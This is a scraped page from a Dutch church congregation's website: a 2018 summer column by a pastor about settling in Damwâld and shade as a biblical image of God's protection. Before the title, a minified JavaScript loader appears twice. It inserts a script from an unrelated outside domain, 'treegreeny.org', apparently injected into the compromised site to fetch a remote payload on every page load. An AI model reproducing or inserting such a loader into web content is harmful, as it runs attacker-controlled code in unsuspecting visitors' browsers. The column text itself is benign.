;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zomer - PKN Damwâld

Zomer

Gepubliceerd op: donderdag 12 juli 2018

Ruim twee maanden wonen we inmiddels in Damwâld en het voelt goed. Veel nieuwe indrukken doen we op. De taal blijft wel bijzonder en sommige Friese woorden spreken tot de verbeelding. Eén zo’n woord is de naam van het kerkblad: Tsjerkenijs. Onwillekeurig denk ik aan een soort cornetto die tijdens de dienst wordt uitgedeeld in de vorm van een kerk. Het hoorntje in de vorm van een torentje. Zouden de diensten in de zomertijd beter bezocht worden met zo’n tsjerken-ijsje? Zou het naar meer smaken?

In Israël is verkoeling iets heel kostbaars. Schaduw brengt al verkoeling en dat is waardevol. Jeasja schreef ooit: „want Gij zijt voor de geringe een sterkte geweest, een sterkte voor de arme toen hij benauwd was, een schuilplaats tegen de stortbui, een schaduw tegen de hitte“ (Jes. 25,4). In de Psalmen klinkt het ook: „De Here is uw Bewaarder, de Here is uw schaduw aan uw rechterhand“ „Hoe kostelijk is uw goedertierenheid, o God; daarom schuilen de mensenkinderen in de schaduw Uwer vleugelen“ (Ps.121,5 en 36,8). Nu de zomer al lang voelbaar is en de koelte kostbaarder wordt, is de verkoeling die de Here in de hitte van het leven aanbiedt uniek.

Een gezegende zomertijd toegewenst,

Ds. G. J. Otter

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns